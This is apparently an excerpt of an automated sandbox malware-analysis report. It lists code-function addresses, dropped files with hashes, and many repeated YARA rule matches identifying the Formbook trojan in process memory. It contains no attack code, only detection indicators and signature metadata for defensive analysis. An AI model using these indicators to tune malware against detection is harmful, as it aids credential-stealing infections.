              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019E010016_2_019E0100
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A3600016_2_01A36000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019FE3F016_2_019FE3F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A702C016_2_01A702C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A465B216_2_01A465B2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A465D016_2_01A465D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F053516_2_019F0535
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F077016_2_019F0770
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A1475016_2_01A14750
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A0C6E016_2_01A0C6E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A0696216_2_01A06962
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A2889016_2_01A28890
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A1E8F016_2_01A1E8F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019D68F116_2_019D68F1
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019E28F016_2_019E28F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019FA84016_2_019FA840
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019EEA8016_2_019EEA80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F2A4516_2_019F2A45
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A08DBF16_2_01A08DBF
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F8DC016_2_019F8DC0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019FAD0016_2_019FAD00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019FED7A16_2_019FED7A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019E0CF216_2_019E0CF2
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F0C0016_2_019F0C00
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A6EFA016_2_01A6EFA0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019E2FC816_2_019E2FC8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A32F2816_2_01A32F28
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A10F3016_2_01A10F30
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A64F4016_2_01A64F40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A02ED916_2_01A02ED9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F0E5916_2_019F0E59
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019FB1B016_2_019FB1B0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A2516C16_2_01A2516C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019DF17216_2_019DF172
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F33F316_2_019F33F3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F52A016_2_019F52A0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A0D2F016_2_01A0D2F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F349716_2_019F3497
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A374E016_2_01A374E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019FB73016_2_019FB730
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F59DA16_2_019F59DA
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F995016_2_019F9950
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019E197916_2_019E1979
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A0B95016_2_01A0B950
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F38E016_2_019F38E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A5D80016_2_01A5D800
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A0FB8016_2_01A0FB80
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A65BF016_2_01A65BF0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A2DBF916_2_01A2DBF9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A63A6C16_2_01A63A6C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A0FDC016_2_01A0FDC0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F3D4016_2_019F3D40
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A09C2016_2_01A09C20
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_01A69C3216_2_01A69C32
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F1F9216_2_019F1F92
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 16_2_019F9EB016_2_019F9EB0
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.msc.exe 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: String function: 0054FD60 appears 40 times
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: String function: 00550DC0 appears 46 times
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: String function: 00A457D8 appears 67 times
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: String function: 00A457A5 appears 34 times
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: String function: 00A46630 appears 31 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: String function: 016EEA12 appears 85 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: String function: 016B5130 appears 58 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: String function: 01A37E54 appears 97 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: String function: 016FF290 appears 105 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: String function: 0166B970 appears 275 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: String function: 01A5EA12 appears 37 times
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: String function: 016C7E54 appears 101 times
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1410420987.0000000006ABA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs M1Y6kc9FpE.exe
              Source: M1Y6kc9FpE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
